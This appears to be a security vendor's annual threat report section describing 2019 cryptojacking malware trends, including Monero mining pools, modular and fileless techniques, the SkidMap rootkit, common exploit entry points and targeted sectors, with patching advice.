In 2019, the pickup in cryptocurrency prices led to an increase in the number of cryptojacking malware families. Of all these families, Monero mining trojans still took a dominant place. EternalBlue and weak password cracking were the major methods for ransomware families to compromise large enterprises in financial and telecom sectors and spread themselves. At the same time, to defeat detection devices, cryptojacking malware families have been constantly upgraded to evolve into more variants that feature better stealth and a modular design.
1. Monero mining remaining a much-pursued activity
According to statistics, the most commonly used mining pool was pool.minexmr.com (46%) in 2019. Most mining pools support Monero, an indirect indicator of the strong presence of Monero mining malware. Their IP addresses revealed that these mining pools were mostly located in North America and Europe, with only a small proportion in East Asia due to cryptocurrency policies of Chinese, Japanese, and South Korean governments. Monero is anonymous, fungible, and censorship resistant, making itself a coveted target for cryptojackers intending to hide their traces from detection devices.
2. Modular design
Cryptojacking malware is coming to maturity. Some families are showing an inclination of using a modular design, allowing flexible configuration of different payloads for different campaigns.
A typical example of modularized cryptojackers is WannaMine, which consists of scanning, exploit, download, persistence, and other modules. As a cryptojacking family, WannaMine, unexpectedly in 2019, acted out of normal behavior to spread DDoS payloads, indicating that different types of malware may cross boundaries when it comes to money.
Untraceability is becoming increasingly necessary for cryptojacking malware, which explains why fileless attacks are gaining popularity. Cryptojackers using this technique are mainly built on PowerShell, leveraging scheduled tasks to reside in systems in an unnoticeable manner.
Moreover, cryptojacking malware tries to juggle things at the levels of system files and drivers. In September 2019, NSFOCUS detected a Monero cryptojacking attack launched by exploiting a vulnerability in Redis. The malicious payload SkidMap (dubbed by McAfee and Trend Micro) used in
this attack would replace binaries of multiple common Linux commands and load a malicious driver to avoid detection. This type of attacks, which combines a backdoor and rootkit, further improves the anonymity of malware and so is more difficult to detect.
4. Myriads of compromise methods
In 2019, cryptojacking malware usually attacked targets by means of remote exploits. EternalBlue and other exploits targeting vulnerabilities in web frameworks (Hadoop Yarn, Apache Struts 2, Confluence, WebLogic, and Jenkins) were most frequently used by cryptojackers to compromise targets and spread themselves. Besides, weak password cracking against Oracle, MySQL, and other databases was also a common attack method.
In terms of the target sectors, finance and telecom were two favorite ones for cryptojacking malware. These sectors usually have a great number of high-performance servers and personal computers deployed to meet their business needs. More often than not, these servers are not properly maintained as expected, making it possible for cryptojackers to gain persistence.
For these reasons, IT managers and operators should upgrade and patch systems in time and configure strong passwords for login to devices to protect enterprises and individuals from being compromised by cryptojackers.
To be continued.